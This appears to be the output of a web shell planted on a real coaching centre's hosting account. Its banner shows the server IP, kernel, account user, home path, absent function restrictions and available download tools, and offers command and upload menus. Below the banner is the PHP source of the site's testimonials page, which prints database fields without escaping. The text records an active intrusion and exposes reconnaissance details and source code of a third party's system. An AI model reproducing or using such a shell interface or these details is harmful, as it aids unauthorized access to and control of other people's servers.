Server IP : 103.53.40.154 / Your IP : 3.145.59.89 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/ppcad7no/leetcoaching.co.in/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<!doctype html> <html class="no-js" lang="zxx"> <head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <?php include("top-link.php") ?> <title>Leet Coaching Center In Delhi | Student Reviews</title> <meta name="description" content="Mission Engineering provides premier LEET coaching in Delhi, featuring expert instructors and customized study plans to help you excel in your entrance exams."> </head> <body> <?php include("header.php"); ?> <main> <div class="it-breadcrumb-area it-breadcrumb-bg" data-background="assets/img/breadcrumb/breadcrumb.jpg"> <div class="container"> <div class="row "> <div class="col-md-12"> <div class="it-breadcrumb-content z-index-3 text-center"> <div class="it-breadcrumb-title-box"> <h3 class="it-breadcrumb-title">testimonial</h3> </div> <div class="it-breadcrumb-list-wrap"> <div class="it-breadcrumb-list"> <span><a href="index-2.html">home</a></span> <span class="dvdr">//</span> <span>testimonial</span> </div> </div> </div> </div> </div> </div> </div> <div class="it-testimonial-5-area it-testimonial-style-2 p-relative pt-20"> <div class="container"> <div class="it-course-title-box text-center mt-25 mb-70"> <span class="it-section-subtitle">Testimonials</span> <h4 class="it-section-title">Our Testimonials </h4> </div> <div class="row"> <?php $sqltesti = "SELECT * FROM tbl_testimonial"; $runtesti = mysqli_query($db,$sqltesti); $activeSlideId = 1; if(mysqli_num_rows($runtesti) > 0 ){ while($datatesti = mysqli_fetch_assoc($runtesti)){ ?> <div class="col-xl-12 col-lg-12 mb-30"> <div class="it-testimonial-5-item p-relative z-index"> <div class="it-testimonial-3-author-box d-flex align-items-center mb-20"> <div class="it-testimonial-3-avata"> <img src="<?php echo $wspath ?>admin/images/property-image/<?php echo $datatesti["image"];?>" alt /> </div> <div class="it-testimonial-3-author-info"> <h5><?php echo $datatesti["name"] ?></h5> </div> </div> <div class="it-testimonial-5-content z-index-5"> <div class="it-testimonial-5-text"> <p> <?php // $description = $datatesti["tes_description"]; // $limited_description = substr($datatesti["tes_description"], 0, 250); echo substr($datatesti["tes_description"], 0, 2050); ?> </p> </div> </div> <div class="it-testimonial-5-quote d-none d-xl-block"> <img src="assets/img/testimonial/quote-1-2.png" alt /> </div> </div> </div> <?php } } ?> </div> </div> </div> </main> <?php include("footer.php"); ?> </body> </html>